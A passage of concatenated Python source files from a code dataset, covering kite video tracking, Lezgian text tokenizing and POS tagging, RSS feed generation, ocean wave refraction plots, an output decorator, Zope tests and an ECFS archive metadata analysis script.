bs_patch.copy(), bbox)\n if kernel_angle_idx is not None:\n angle = self.MF.getTargetAngle(kernel_angle_idx, bs_patch, frame_original.copy(), \n center_loc, bbox, self.prev_angle)\n center_loc = (np.array(center_loc) + np.array(bbox[:2])).astype(int)\n if angle is not None:\n self.prev_angle = angle\n else:\n return False, bbox, None, center_loc\n else:\n center_loc = (np.array(center_loc) + np.array(bbox[:2])).astype(int)\n return False, bbox, None, center_loc\n else:\n return False, bbox, None, None\n # Calculate Frames per second (FPS)\n fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer);\n\n if verbose:\n # Print out current info.\n print(\"image {:5d} | bbox: {:4d} {:4d} {:3d} {:3d} | FPS: {:2d} | anlge: {}\".format(\n self.frame_num, \n int(bbox[0]), int(bbox[1]), \n int(bbox[2]), int(bbox[3]),\n int(fps),\n angle)) \n return ok, bbox, angle, center_loc\n\n# This is an example for using Interface\n# To avoid opening opencv window and verbose information, \n# please set the variables:\n# WRITE_TMP_RESULT = True\n# DEBUG_MODE = False\n# \nif __name__ == \"__main__\":\n # Read video\n files = glob.glob(IMAGE_PATH)\n assert len(files) > 0\n\n _, path_and_file = os.path.splitdrive(files[0])\n path, file = os.path.split(path_and_file)\n\n video = Video(files, FILE_FORMAT, START_FRAME)\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file')\n sys.exit()\n\n tracker = Interface()\n tracker.init_tracker(frame)\n\n while True:\n # Read one frame\n ok, frame = video.read()\n if not ok:\n print('Cannot read video file')\n sys.exit()\n\n # Obtain results\n ok, bbox, angle, center_loc = tracker.update(frame, verbose=False)\n if ok:\n print(\"bbox: {:4d} {:4d} {:3d} {:3d} | anlge: {:3d} | center: {:4d} {:4d}\".format(\n int(bbox[0]), int(bbox[1]), \n int(bbox[2]), int(bbox[3]),\n int(angle),\n center_loc[0], center_loc[1])) \n drawBox(frame, bbox)\n drawAnlge(frame, angle, bbox)\n drawPoint(frame, center_loc)\n frame_resize = cv2.resize(frame, (512, 512))\n cv2.imshow(\"frame\", frame_resize)\n cv2.waitKey(1)\n else:\n print(\" ->Tracking failed!!!\")\n\n\n\n\n\n\n\n\n","sub_path":"Kite_Tracking_angle_detection_16fps/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"203301015","text":"import re\ntext = open('wiki.txt', encoding='utf-8-sig')\ntext = text.read()\ntext = re.sub(' ',' ',text)\nstr = re.sub('\\\\n\\\\n',' ',text)\n#str1 = 'Я люблю есть. Она любит есть? Он - он любит есть! Она) любит есть.'\nsentences = []\npunct = ['.','!','?']\npunct2 = [';',':','-','\"', '(', ')', ',']\ntokens = []\ndict_tokens = {}\ntranslit_dict = {'а': 'a',\n 'б': 'b',\n 'в': 'v',\n 'г': 'g',\n 'д': 'd',\n 'е': 'e',\n 'ё': 'jo',\n 'ж': 'zh',\n 'з': 'z',\n 'и': 'i',\n 'й': 'i',\n 'к': 'k',\n 'л': 'l',\n 'м': 'm',\n 'н': 'n',\n 'о': 'o',\n 'п': 'p',\n 'р': 'r',\n 'с': 's',\n 'т': 't',\n 'у': 'u',\n 'ф': 'f',\n 'х': 'kh',\n 'ц': 'c',\n 'ч': 'ch',\n 'ш': 'sh',\n 'щ': 'shch',\n 'ъ': '',\n 'ы': 'y',\n 'ь': '′',\n 'э': 'e',\n 'ю': 'ju',\n 'я': 'ya'}\n\nstr = str.split()\n\ndef translit(word):\n new_word = ''\n for j in word:\n if j.lower() in translit_dict:\n new_word += translit_dict[j.lower()]\n else:\n new_word += j.lower()\n return(new_word)\n\n\ntokens_for_sent = []\nindex = 1\nfor i in str:\n if len(i) > 1 and i[-1] not in punct:\n tokens_for_sent.append([index, i, translit(i)])\n index += 1\n elif len(i) > 1 and i[-1] in punct:\n tokens_for_sent.append([index, i[:-1], translit(i[:-1])])\n index += 1\n tokens_for_sent.append([index, i[-1], translit(i[-1])])\n tokens.append([tokens_for_sent])\n tokens_for_sent = []\n index = 1\n else:\n tokens_for_sent.append([index, i[-1], translit(i[-1])])\n index+=1\n\nprint(tokens)\n#--------------------------------------------------------------Segmenter + tokeniser + translit\n\nfor i in tokens[1]:\n print('%s\\t' % ('index'),('word'),('translit'), end='')\n print('\\n')\n for j in i:\n for k in j:\n print('%s\\t' % (k), end='')\n print('\\n')\n\ni = 0\nfor qq in tokens:\n for q in qq:\n if i < 100:\n print(q)\n i += len(q)\n else:\n break\n\n#-------------------------------------------------------------Tokens for POS marking\n\nlez_dict = [[[[1, 'Нептун:', 'neptun:', 'NOUN'], [2, 'Нептун', 'neptun', 'NOUN'], [3, '—', '—', 'PUNCT'], [4, 'Ракъинин', 'rakinin', 'ADJ'], [5, 'системада', 'sistemada', 'NOUN'], [6, 'планета', 'planeta', 'NOUN'], [7, '.', '.', 'PUNCT']],\n[[1, 'Ё:', 'jo:', 'NOUN'], [2, 'Ё', 'jo', 'NOUN'], [3, 'А', 'a', 'PRON'], [4, '(кирилл):', '(kirill):', 'NOUN'], [5, 'А,', 'a,', 'PRON'], [6, 'а', 'a', 'PRON'], [7, '—', '—', 'PUNCT'], [8, '\"А,', '\"a,', 'PRON'], [9, 'а\"', 'a\"', 'PRON'], [10, 'садлагьай', 'sadlag′ai', 'NUM'], [11, 'гьарф', 'g′arf', 'VERB'], [12, 'лезги', 'lezgi', 'ADJ'], [13, 'алфибдин', 'alfibdin', 'NOUN'], [14, '.', '.', 'PUNCT']],\n[[1, 'Ачух', 'achukh', 'ADJ'], [2, 'гьарф', 'g′arf', 'NOUN'], [3, 'я', 'ya', 'NOUN'], [4, '.', '.', 'PUNCT']],\n[[1, 'Абажур:', 'abazhur:', 'NOUN'], [2, 'Абажур', 'abazhur', 'NOUN'], [3, '(),', '(),', 'PUNCT'], [4, '()', '()', 'PUNCT'], [5, '-', '-', 'PUNCT'], [6, 'гудай', 'gudai', 'VERB'], [7, 'лампадал', 'lampadal', 'NOUN'], [8, 'акьалжнавай', 'ak′alzhnavai', 'PART'], [9, 'парчадикай', 'parchadikai', 'ADJ'], [10, 'раснавай', 'rasnavai', 'PART'], [11, 'къалпагъ', 'kalpag', 'NOUN'], [12, '.', '.', 'PUNCT']],\n[[1, 'Абдул', 'abdul', 'NOUN'], [2, 'Мухътедир', 'mukhtedir', 'NOUN'], [3, 'Айдунбекви:', 'aidunbekvi:', 'NOUN'], [4, 'Биография', 'biografiya', 'NOUN'], [5, '.', '.', 'PUNCT']],\n[[1, 'Дагъустан', 'dagustan', 'ADJ'], [2, 'республикадин', 'respublikadin', 'ADJ'], [3, 'Самур', 'samur', 'NOUN'], [4, 'округдин', 'okrugdin', 'NOUN'], [5, 'Ахцегь', 'akhceg′', 'NOUN'], [6, 'хуьре,', 'khu′re,', 'NOUN'], [7, 'кесиб', 'kesib', 'ADJ'], [8, '—', '—', 'PUNCT'], [9, 'лежбердин', 'lezhberdin', 'NOUN'], [10, 'кӀвале', 'kӏvale', 'NOUN'], [11, 'хьана', 'kh′ana', 'VERB'], [12, '.', '.', 'PUNCT']],\n[[1, '1898', '1898', 'NUM'], [2, 'йисалай,', 'iisalai,', 'ADV'], [3, 'Бакуда', 'bakuda', 'NOUN'], [4, 'нафтадин', 'naftadin', 'PART'], [5, 'промышленностда', 'promyshlennostda', 'NOUN'], [6, 'кӀвалахзва', 'kӏvalakhzva', 'NOUN'], [7, '.', '.', 'PUNCT']],\n[[1, '1904', '1904', 'NUM'], [2, 'йисуз', 'iisuz', 'ADV'], [3, 'Коммунист', 'kommunist', 'ADJ'], [4, 'партиядин', 'partiyadin', 'NOUN'], [5, 'касарикай', 'kasarikai', 'NOUN'], [6, 'сад', 'sad', 'ADV'], [7, 'жезва', 'zhezva', 'NOUN'], [8, '.', '.', 'PUNCT']],\n[[1, '«Гуммет»', '«gummet»', 'NOUN'], [2, 'социал', 'social', 'ADJ'], [3, '—', '—', 'PUNCT'], [4, 'демократик', 'demokratik', 'ADJ'], [5, 'кӀеретӀдин,', 'kӏeretӏdin,', 'NOUN'], [6, 'нафтадин', 'naftadin', 'PART'], [7, 'промышленностда', 'promyshlennostda', 'NOUN'], [8, 'кӀвалахзвабрин', 'kӏvalakhzvabrin', 'ADJ'], [9, 'садвалдин', 'sadvaldin', 'NOUN'], [10, 'ва', 'va', 'CONJ'], [11, '1906', '1906', 'NUM'], [12, 'йисуз', 'iisuz', 'ADV'], [13, '—', '—', 'PUNCT'], [14, '«Фаррук»', '«farruk»', 'NOUN'], [15, '—', '—', 'PUNCT'], [16, 'социал', 'social', 'ADJ'], [17, '—', '—', 'PUNCT'], [18, 'демократик', 'demokratik', 'ADJ'], [19, 'кӀретӀдин', 'kӏretӏdin', 'ADJ'], [20, 'актив', 'aktiv', 'NOUN'], [21, 'иштиракчи', 'ishtirakchi', 'NOUN'], [22, 'хьанва', 'kh′anva', 'VERB'], [23, '.', '.', 'PUNCT']],\n[[1, 'Пачагьлугъ', 'pachag′lug', 'NOUN'], [2, 'паталай', 'patalai', 'PREP'], [3, 'са', 'sa', 'NUMB'], [4, 'шумуд', 'shumud', 'ADJ'], [5, 'сфер', 'sfer', 'NOUN'], [6, 'жазарих', 'zhazarikh', 'VERB'], [7, 'галукьнвайдия', 'galuk′nvaidiya', 'VERB'], [8, '.', '.', 'PUNCT']]]]\n\npos = []\nfor i in lez_dict:\n for k in i:\n for j in k:\n c = j[1].strip('»«:;\"')\n pos.append([c, j[3]])\n\n#print(pos)\n\ndict_pos_words = {}\ndict_pos = {}\n\n#print(len(pos))\n\nfor i in pos:\n if i[1] not in dict_pos_words:\n dict_pos_words[i[1]] = 1\n else:\n j = dict_pos_words[i[1]] + 1\n dict_pos_words[i[1]] = j\n\nfor i in pos:\n if (i[0], i[1]) not in dict_pos_words:\n dict_pos_words[(i[0], i[1])] = 1\n else:\n j = dict_pos_words[(i[0], i[1])] + 1\n dict_pos_words[(i[0], i[1])] = j\n\nfor i in pos:\n if i[0] not in dict_pos_words:\n dict_pos_words[i[0]] = 1\n else:\n j = dict_pos_words[i[0]] + 1\n dict_pos_words[i[0]] = j\n\n\n#print(dict_pos_words)\n\nt = []\nfor i in pos:\n if i[1] not in t:\n t.append(i[1])\n\n#print(t)\n\ntt = []\nfor i in pos:\n if i not in tt:\n print(i)\n tt.append(i)\n\n#print(tt)\n\nprint(('form'),('POS'),('count'),('p'))\nfor i in t:\n print(('--'), (i), (dict_pos_words[i]), (dict_pos_words[i] / 100))\nfor i in tt:\n print((i[0]), (i[1]), (dict_pos_words[i[0]]), (dict_pos_words[(i[0], i[1])] / dict_pos_words[i[0]]))\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"160515113","text":"import datetime\nfrom rfeed import *\nfrom dateutil.parser import parse\n\ndef get_rss_for_json(data):\n items = []\n for article in data['articles']:\n pubDate = datetime.datetime.now()\n try:\n pubDate = parse(article['publishedAt'])\n except:\n pass\n item = Item(\n \ttitle = article['title'],\n \tlink = article['url'],\n \tdescription = article['description'],\n author = article['author'],\n guid = Guid(article['url']),\n \tpubDate = pubDate)\n items.append(item)\n\n feed = Feed(title = \"Newsapi RSS Feed\",\n \tlink = \"https://newsapi.org\",\n \tdescription = \"Newsapi\",\n \tlanguage = \"en-US\",\n \tlastBuildDate = datetime.datetime.now(),\n \titems = items)\n\n return feed.rss()\n","sub_path":"rss.py","file_name":"rss.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"452243447","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 28 22:54:08 2019\r\n\r\n@author: AHIABA\r\n\"\"\"\r\nimport gdal\r\nimport math\r\nimport numpy as np\r\nimport matplotlib as mpl\r\nmpl.use('Qt5Agg')\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport time\r\nimport numpy as np\r\n\r\n\r\n\r\ndef generate_conditions(input_tiff, initial_angle, wave_period,init_wave_height):\r\n \"\"\"\r\n Accepts Bathymetry data and initial wave conditions, and returns an image of the water region with quiver plots of refraction.\r\n :param wave_period: Period of the wave in Seconds\r\n :param input_tiff: Location of the bathymetry data in TIFF format, on disk.\r\n :param initial_angle: Initial Wave Angle\r\n :return:\r\n \"\"\"\r\n \r\n g = 9.81 # Gravity\r\n init_ang = \"Quiver plot of \" + str(initial_angle) + \" degrees Incidence wave\"\r\n initial_angle = np.deg2rad(initial_angle)\r\n wave_length = g * (wave_period ** 2) / (2 * np.pi)\r\n initial_celerity = wave_length / wave_period\r\n\r\n gdal_ds = gdal.Open(input_tiff)\r\n gdal_band = gdal_ds.GetRasterBand(1)\r\n nodataval = gdal_band.GetNoDataValue()\r\n\r\n grid_size = 50\r\n data_array = rot270(gdal_ds.ReadAsArray().astype(np.float))\r\n rows, cols = data_array.shape\r\n data_array = data_array[\r\n 0 : (rows // grid_size * grid_size), 0 : (rows // grid_size * grid_size)\r\n ]\r\n\r\n if np.any(data_array == nodataval):\r\n data_array[data_array == nodataval] = np.nan\r\n\r\n out_full_path, file_name = generate_output_name(\"png\")\r\n\r\n fig = plt.figure(figsize=(25, 20))\r\n #plt.show()\r\n # Plot contour using matplotlib\r\n plt.contour(data_array, cmap=\"viridis\", levels=list(range(-1200, 0, 50)))\r\n plt.colorbar()\r\n\r\n rows, cols = data_array.shape\r\n\r\n # Create a grid representation of depths where each grid is a square of length 'grid_size'\r\n depths = np.average(\r\n np.split(\r\n np.average(\r\n np.split(data_array, math.ceil(cols / grid_size), axis=1), axis=-1\r\n ),\r\n math.ceil(rows / grid_size),\r\n axis=1,\r\n ),\r\n axis=-1,\r\n )\r\n\r\n # Data is negative to indicate depths, but we need the value of the depths, so convert to positive.\r\n# depths = np.where(depths < 0, -depths, 0)\r\n\r\n # From formula\r\n celerity = np.sqrt(g * depths)\r\n\r\n # From formula\r\n wave_directions = np.arcsin((celerity * np.sin(initial_angle)) / initial_celerity)\r\n\r\n # Replace 'nan' with initial angle.\r\n wave_directions = np.where(\r\n np.isnan(wave_directions), initial_angle, wave_directions\r\n )\r\n #plt.show()\r\n # Quiver arrows\r\n U = np.sin(wave_directions)\r\n V = np.cos(wave_directions)\r\n \r\n X, Y = np.meshgrid(np.arange(0, rows, grid_size), np.arange(0, cols, grid_size))\r\n# fig = plt.figure()\r\n# plt.subplot\r\n# plt.show()\r\n # Plot Quiver diagrams over the contour using matplotlib\r\n q = plt.quiver(X, Y, U, V)\r\n plt.quiverkey(q, X=0.3, Y=1.1, U=10, label=str(init_ang), labelpos=\"E\")\r\n \r\n \r\n # Plot configurations\r\n plt.gca().set_aspect(\"equal\", adjustable=\"box\")\r\n plt.savefig(out_full_path, bbox_inches=\"tight\")\r\n plt.show() \r\n depth_val = \"Respective Grid Points for the Wave Heights: \"\r\n return file_name,depth_val,depths\r\ndef generate_output_name(file_format=\"png\"):\r\n file_name = \"{}.{}\".format(int(time.time()), file_format)\r\n\r\n # Replace line below with absolute path to output directory.\r\n out_dir = r'C:/Users/AHIABA/Desktop'\r\n return os.path.join(out_dir, file_name), file_name\r\n\r\n\r\ndef rot270(array):\r\n \"\"\"\r\n Rotates a numpy array by 270 degrees.\r\n :param array:\r\n :return:\r\n \"\"\"\r\n return np.rot90(np.rot90(np.rot90(array)))\r\n\r\ng = 9.81\r\nenter_file_name = input(\"Enter the directory where the .tif/.netCDF file is saved: \")\r\ng = 9.81\r\nT = float(input('Input Period: '))\r\nHo = float (input('Input wave height: '))\r\nd = float(input ('Input Depth of water: '))\r\nA= int(input ('Input initial angle: '))\r\nfor i in range(int(T),0,-1):\r\n Lo = float((g * pow(i,2))/(2* math.pi))\r\n\r\n Co = Lo/i\r\n \r\n Steepness = Ho/Lo\r\n U = float((math.pi * Ho)/i)\r\n\r\n \r\n C = float(math.sqrt(g * d))\r\n\r\n L = float (C * i)\r\n\r\n \r\n B = math.sin(A * (math.pi/180))\r\n D = Co/C\r\n E = B * D\r\n Alpha = Co*math.sin(A)/C\r\n \r\n Kr = round(math.sqrt(math.cos(A * math.pi/180)/math.cos(Alpha * math.pi/180)),2)\r\n\r\n Ks = round(math.sqrt(Co/(2*C)),2)\r\n\r\n H = Ho * round(Kr,2) * round(Ks,2)\r\n \r\n print(\"Wave Period\\t\\tWave Height\\t\\tCoeff of Shaoling\\t\\tWL(Deep-Water)\\t\\tWL(Shallow-Water)\\t\\tAngle between Crests\")\r\n print(i,\"\\t\\t\\t\",H,\"\\t\\t\\t\",round(Ks,3),\"\\t\\t\\t\",round(Lo,3),\"\\t\\t\\t\",round(L,3),\"\\t\\t\\t\",math.degrees(Alpha))\r\nprint(\"Coefficient of Refraction= \",round(Kr,3))\r\nprint ('Final Wave Height = ',H)\r\nresult = generate_conditions(enter_file_name,A,T,Ho)\r\nprint(result)\r\nprint(\"The Final Wave Height: \",H)\r\ninputs = input(\"Press any Key to exit...\")","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"213243287","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport inspect\nfrom time import gmtime, strftime\n\n\nclass OutputDecorator:\n \n def __init__(self, out, prefix):\n \"\"\"\n \n \n Args:\n out: Original output stream.\n prefix: A prefix string to be attached to each line. \n #F will be replaced with invoking method name.\n #T with current time.\n #S adjust prefix width by 10 characters \n e.g. #S#S#S forces prefix width to be at least 30. \n \"\"\"\n self._out = out \n self._prefix = prefix.replace(\"#S\", \"\")\n self._hash_f = \"#F\" in prefix\n self._hash_t = \"#T\" in prefix\n self._adjust_prefix_size = self._adjust_prefix_size = prefix.count(\"#S\")*10\n self._last_char = \"\\n\"\n\n @staticmethod\n def astrlen(s, l=30):\n return s.ljust(l, \" \")\n \n def write(self, txt):\n if len(txt)==0: return \n \n #format prefix\n prefix = self._prefix\n if self._hash_f: \n curframe = inspect.currentframe()\n calframe = inspect.getouterframes(curframe, 2)\n prefix = prefix.replace(\"#F\", calframe[1][3])\n if self._hash_t:\n prefix = prefix.replace(\"#T\", strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n prefix = OutputDecorator.astrlen(prefix, self._adjust_prefix_size)\n \n #format output\n if self._last_char==\"\\n\":\n self._out.write(prefix)\n self._out.write(txt.rstrip(\"\\n\").replace(\"\\n\", \"\\n%s\" % prefix)) \n self._last_char = txt[-1]\n if self._last_char==\"\\n\":\n self._out.write(\"\\n\") \n \n \n ","sub_path":"ui/out_formatter.py","file_name":"out_formatter.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"26651404","text":"import os\nimport unittest\n\nfrom zope.testing import doctest\nfrom zope.app.testing import functional\n\nminimal_zcml = os.path.join(os.path.dirname(__file__), 'minimal-ftesting.zcml')\nTestMinimalLayer = functional.ZCMLLayer(\n minimal_zcml, __name__, 'TestMinimalLayer')\npagelet_zcml = os.path.join(os.path.dirname(__file__), 'pagelet-ftesting.zcml')\nTestPageletLayer = functional.ZCMLLayer(\n pagelet_zcml, __name__, 'TestPageletLayer')\n\noptionflags = doctest.NORMALIZE_WHITESPACE + doctest.ELLIPSIS\n\ndef setUp(test):\n functional.FunctionalTestSetup().setUp()\n\ndef tearDown(test):\n functional.FunctionalTestSetup().tearDown()\n\ndef test_suite():\n suite = unittest.TestSuite()\n dottedname = 'mars.layer.ftests.%s'\n for name in ['minimal', 'directive']:\n test = doctest.DocTestSuite(\n dottedname % name, setUp=setUp,\n tearDown=tearDown, optionflags=optionflags)\n test.layer = TestMinimalLayer\n suite.addTest(test)\n test = doctest.DocTestSuite(\n dottedname % 'pagelet', setUp=setUp,\n tearDown=tearDown, optionflags=optionflags)\n test.layer = TestPageletLayer\n suite.addTest(test)\n return suite\n\n\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n\n\n","sub_path":"Sandbox/darrylcousins/tfws.website/mars.layer/mars/layer/ftests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"180108288","text":"#!/usr/bin/env python2\n\n\"\"\"analyze.py: Reads and analyzes ecfs metadata db dump.\"\"\"\n__author__ = \"Matthias Grawinkel\"\n__status__ = \"Production\"\n\n\nimport matplotlib\nmatplotlib.use('Agg')\n\nfrom matplotlib import pyplot\nfrom matplotlib import dates\n\nimport numpy as np\n\nimport sys\nimport os\nimport gzip\nimport time\nimport calendar\nimport datetime\nimport resource\nimport re\nimport math\nimport json\n\nfrom collections import defaultdict\nfrom collections import Counter\n\nimport hashlib\n\nfrom file_size_groups import *\n\nMONITOR_LINES=100000\n\n# used for cdf plot\nspace_per_uid = Counter()\nfiles_per_uid = Counter()\n\n\n# used for file size histogram\nnum_files_per_size_category = Counter()\ntotal_size_per_size_category = Counter()\n\n# file_size_counter = Counter()\n\nfiles_per_dir_counter = Counter()\n\nstats = defaultdict(int)\n\n# how many .grib files are there?\nfile_extension_cnt = Counter()\nfile_extension_size = Counter()\n\ncreated_capacity_cnt = defaultdict(int)\ncreated_capacity_size = defaultdict(int)\n\nmodified_capacity_cnt = defaultdict(int)\nmodified_capacity_size = defaultdict(int)\n\n\n# this one will get HUUUUUGE\nfile_map = dict()\n\ndef prettyfy(number):\n d = float(number)\n if d - int(d) > 0:\n return '{:,.3f}'.format(d)\n return '{:,d}'.format(int(d))\n\ndef to_gigabyte(val):\n return (float(val) / 1024 / 1024 / 1024)\n\ndef to_terabyte(val):\n return (float(val) / 1024 / 1024 / 1024 / 1024)\n\ndef to_petabyte(val):\n return (float(val) / 1024 / 1024 / 1024 / 1024 / 1024)\n\ndef to_millions(val):\n return (float(val) / 1000 / 1000)\n\ndef to_billions(val):\n return (float(val) / 1000 / 1000 / 1000)\n\nclass Timer():\n def __init__(self, s):\n self.s = s\n\n def __enter__(self):\n self.start = time.time()\n\n def __exit__(self, *args):\n print (\"%s: %fs\" % (self.s, (time.time() - self.start)))\n\n\ndef get_md5(s, hexdigest=False):\n # return s\n m = hashlib.md5()\n m.update(s.encode())\n if hexdigest:\n return m.hexdigest()\n else:\n return m.digest()\n\n\n\ndef days_between(ts1, ts2):\n \"\"\"\n '20050620-004900',\n '19700101-000000',\n '20120615-075612',\n \"\"\"\n if ts1 == '19700101-000000' or ts2 == '19700101-000000':\n return None\n\n t1 = datetime.datetime.strptime(ts1, \"%Y%m%d-%H%M%S\")\n t2 = datetime.datetime.strptime(ts2, \"%Y%m%d-%H%M%S\")\n return (t1 - t2).days\n\n\ndef load(source_file, max_lines=None,log_start=\"20140905-000000\"):\n\n object_re = re.compile(\"^\\s*([\\d]+)\\s*([\\d]+)\\s*([\\d]+)\\s*([\\d]+)\\s*([\\d]+-[\\d]+)\\s*([\\d]+-[\\d]+)\\s*([\\d]+-[\\d]+)\\s*([a-zA-Z0-9/.\\-]+)\\s*x'([[a-zA-Z0-9/.\\-]+)'\\s*$\")\n\n\n with gzip.open(source_file, 'rt') as source:\n t = time.time()\n plines = 0\n for line in source:\n plines += 1\n if plines % MONITOR_LINES == 0:\n print (\"processed lines: %d, mem: %rMB, lines/s: %r: found files: %d\" %\n (plines,\n float(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss) / 1024 / 1024,\n int(MONITOR_LINES / (time.time() - t)),\n len(file_map)\n )\n )\n t = time.time()\n\n if max_lines:\n if plines >= max_lines:\n break\n\n m = object_re.match(line)\n\n if m:\n r = m.groups()\n\n size = int(r[0])\n uid = int(r[1])\n gid = int(r[2])\n cos = int(r[3]) # cosid is Class-of-Service in HPSS\n creation_time = str(r[4])\n read_time = str(r[5])\n mod_time = str(r[6])\n path = str(r[7])\n magic = str(r[8]) # $bitfileid,$objectid;?\n\n stats[\"total_files\"] += 1\n stats[\"total_size\"] += size\n stats[\"max_file_size\"] = max(stats[\"max_file_size\"], size)\n\n # for cdf\n files_per_uid[uid] += 1\n space_per_uid[uid] += size\n\n # for file size histogram\n g = get_file_size_group(size)\n num_files_per_size_category[g] += 1\n total_size_per_size_category[g] += size\n\n # can be used for average file sizes et al.\n # file_size_counter[size] += 1\n\n #file name\n file_name = os.path.basename(path)\n\n if file_name.__contains__('.'):\n extension = file_name[file_name.rfind('.'):]\n else:\n extension = \"unknown\"\n \n file_extension_cnt[extension] += 1\n file_extension_size[extension] += size\n\n # files per dir\n dir_id = get_md5(os.path.dirname(path))\n files_per_dir_counter[dir_id] += 1\n\n # access times\n file_age_days = days_between(log_start, creation_time)\n\n created_capacity_cnt[file_age_days] += 1\n created_capacity_size[file_age_days] += size\n \n last_read_days = days_between(log_start, read_time)\n if not last_read_days:\n stats[\"unread_files_cnt\"] += 1\n stats[\"unread_files_size\"] += size\n \n last_modified_days = days_between(log_start, mod_time)\n modified_capacity_cnt[file_age_days] += 1\n modified_capacity_size[file_age_days] += size\n\n file_db_entry = (size, file_age_days, last_read_days, last_modified_days)\n\n # this will get large, but is required for the more interesting plots.\n file_map[get_md5(path)] = file_db_entry\n\n # how many days ago did a directory see its last upload / download / change?\n # how many files exist that have not been accessed since X days / never been read at all?\n # file_age to capacity?\n\ndef generate_x_labels(log_start):\n \n x_vals = list()\n deltas = list()\n day_0 = datetime.datetime.strptime(log_start, \"%Y%m%d-%H%M%S\")\n\n deltas.append(0)\n x_vals.append(day_0)\n \n d = day_0.replace(day=1)\n for i in range(80):\n delta = (day_0 - d).days\n deltas.append(delta)\n # print (d, delta)\n d -= datetime.timedelta(days=10)\n d = d.replace(day=1)\n x_vals.append(d)\n\n return x_vals, deltas\n\ndef unaccessed_files_plot(target_graph_dir, log_start, source_type):\n\n print(str(datetime.datetime.now()), \"start to prepare unaccessed_files_plot\")\n \n # these metrics will be plotted.\n unaccessed_files_cnt = Counter()\n unmodified_files_cnt = Counter()\n unread_files_cnt = Counter()\n total_created_files = Counter()\n existing_never_read_files = Counter()\n\n # index to filemap contents\n CREATION_DAYS = 1\n READ_DAYS = 2\n MODIFIED_DAYS = 3\n\n x_val_dates, deltas = generate_x_labels(log_start)\n x_val_dates = dates.date2num(x_val_dates)\n\n for days in deltas:\n # print (days)\n\n for f in file_map.itervalues():\n # print (f)\n if f[CREATION_DAYS] > days:\n total_created_files[days] += 1\n # make sure the file actually exists\n\n if f[READ_DAYS] and f[MODIFIED_DAYS]:\n if days < min(f[READ_DAYS], f[MODIFIED_DAYS]):\n unaccessed_files_cnt[days] += 1\n\n if days < f[MODIFIED_DAYS]:\n unmodified_files_cnt[days] += 1\n\n if days < f[READ_DAYS]:\n unread_files_cnt[days] += 1\n\n else:\n existing_never_read_files[days] += 1\n # some files have no f[2] (read_time) value\n if days < f[MODIFIED_DAYS]:\n unaccessed_files_cnt[days] += 1\n unmodified_files_cnt[days] += 1\n # print(json.dumps(unaccessed_files_cnt, sort_keys=True, indent=2))\n print(str(datetime.datetime.now()), \"plotting unaccessed_files_plot\")\n \n y_vals = defaultdict(list)\n \n ax_files = [(total_created_files, \"Existing files\", 'k', ':o'),\n (unaccessed_files_cnt, \"Unaccessed files\", 'r', '-s'),\n (unmodified_files_cnt,\"Unmodified files\", 'g', '--*'), \n (unread_files_cnt, \"Unread files\", 'b', '-.+'),\n (existing_never_read_files, \"Existing never read files\", 'k', ':x')\n ]\n\n for p in ax_files:\n for key in deltas:\n y_vals[p[1]].append(to_millions(p[0][key]))\n \n\n fig, ax = pyplot.subplots()\n pyplot.xticks(rotation=90)\n pyplot.tick_params(labelsize=16)\n \n for p in ax_files:\n key_name = p[1]\n col = p[2]\n linestyle = p[3]\n\n ax.plot(x_val_dates, y_vals[key_name], linestyle, linewidth=2, color=col, label=key_name)\n\n if source_type == \"ECFS\":\n ax.legend(loc=\"upper left\")\n else:\n ax.legend(loc=\"center left\")\n\n\n ylabela = ax.set_ylabel('Existing files in mil', fontsize=24)\n \n #============ DATE FORMATTING =================\n ax.xaxis.set_major_locator(dates.MonthLocator(bymonth=[1,4,7,10]))\n ax.xaxis.set_minor_locator(dates.MonthLocator(interval=1))\n ax.xaxis.set_major_formatter(dates.DateFormatter('%Y/%m'))\n \n #============ /DATE FORMATTING =================\n\n ax.yaxis.grid(True)\n ax.xaxis.grid(True)\n \n sizes = fig.get_size_inches()\n fig.set_size_inches(sizes[0]*1.5, sizes[1])\n\n pyplot.tight_layout()\n outfile = os.path.join(target_graph_dir, \"unaccessed_files_plot.pdf\")\n pyplot.savefig(outfile, bbox_extra_artists=[ylabela], bbox_inches='tight')\n print(\"saved %s\" % (outfile))\n pyplot.close()\n\n\n ###########################################\n # print(json.dumps(unaccessed_files_cnt, sort_keys=True, indent=2))\n print(str(datetime.datetime.now()), \"plotting unaccessed_files_plot_2\")\n \n # x_vals = defaultdict(list)\n y_vals = defaultdict(list)\n # right_y_vals = defaultdict(list)\n\n ax_files = [(unaccessed_files_cnt, \"Unaccessed files\", 'r', '-s'),\n (unmodified_files_cnt,\"Unmodified files\", 'g', '--*'), \n (unread_files_cnt, \"Unread files\", 'b', '-.+'),\n (existing_never_read_files, \"Existing never read files\", 'k', ':x')\n ]\n\n for p in ax_files:\n # relative fraction to created files\n # y_temp = 0\n for key in deltas:\n # print (\"x:%d, y:%d\" % (key.p))\n # x_vals[p[1]].append(key)\n frac = float(p[0][key]) / float(total_created_files[key]) * 100\n y_vals[p[1]].append(frac)\n\n fig, ax = pyplot.subplots()\n pyplot.xticks(rotation=90)\n pyplot.tick_params(labelsize=16)\n \n for p in ax_files:\n key_name = p[1]\n col = 